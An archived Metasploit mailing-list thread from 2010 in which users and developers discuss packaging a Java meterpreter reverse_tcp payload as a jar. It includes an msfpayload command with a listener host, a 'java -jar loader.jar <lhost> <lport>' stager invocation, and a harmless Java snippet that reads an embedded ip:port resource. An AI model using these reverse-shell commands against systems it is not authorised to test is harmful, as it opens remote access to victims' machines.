Metasploit mailing list archives
Re: Using msfpayload to create a reverse java meterpreter
From: scriptjunkie <scriptjunkie1 () googlemail com>
Date: Mon, 16 Aug 2010 20:26:06 -0400
Well, this is late, but I would use resources. Java can access files
within the .jar by using something like this:
InputStream is =
getClass().getClassLoader().getResourceAsStream("info.txt") which will
retrieve a stream to the file info.txt in the root of the jar file.
(of course a jar file is just a renamed .zip) So if we can edit a file
and zip up a folder, we can create a custom jar payload. For example,
see attached jar, with source as follows:
public class Main {
public static void main(String[] args) throws Exception {
Main main = new Main();
}
public Main() throws Exception{
java.io.BufferedReader br = new java.io.BufferedReader(new
java.io.InputStreamReader(
getClass().getClassLoader().getResourceAsStream("info.txt")));
String ipPort = br.readLine();
javax.swing.JOptionPane.showMessageDialog(null, ipPort);
}
}
Do we have any code that zips up a folder?
On Thu, Aug 12, 2010 at 2:41 PM, <egypt () metasploit com> wrote:
Not yet. Right now you can take data/java/loader.jar and run it with "java -jar loader.jar <lhost> <lport>" to achieve your goal, but we haven't worked out the details of dynamically building stagers without requiring a JDK. If anyone on the list has a strong understanding of java bytecode and would like to take a look at modifying the jar in ruby, or if anyone has a better idea for creating self-contained stagers, please get in touch. egypt 2010/7/30 Shai rod <shai_r () msn com>:Hi all, I was wondering, if its possible to create a "java/meterpreter/reverse_tcp" jar file using msfpayload ? I have tried to create one as follows: msfpayload java/meterpreter/reverse_tcp LHOST=192.168.1.116 R > payload.jar when i try to execute it i get : # java -jar payload.jar Invalid or corrupt jarfile pay.jar Thank you in advance, Shai. _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
-- scriptjunkie https://scriptjunkie1.wordpress.com/
Attachment:
resourceExample.jar
Description:
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- using msfpayload to create a reverse java meterpreter Shai rod (Jul 30)
- <Possible follow-ups>
- Using msfpayload to create a reverse java meterpreter Shai rod (Jul 30)
- Re: Using msfpayload to create a reverse java meterpreter egypt (Aug 12)
- Re: Using msfpayload to create a reverse java meterpreter scriptjunkie (Aug 16)
- Re: Using msfpayload to create a reverse java meterpreter scriptjunkie (Aug 16)
- Re: Using msfpayload to create a reverse java meterpreter egypt (Aug 16)
- Re: Using msfpayload to create a reverse java meterpreter egypt (Aug 12)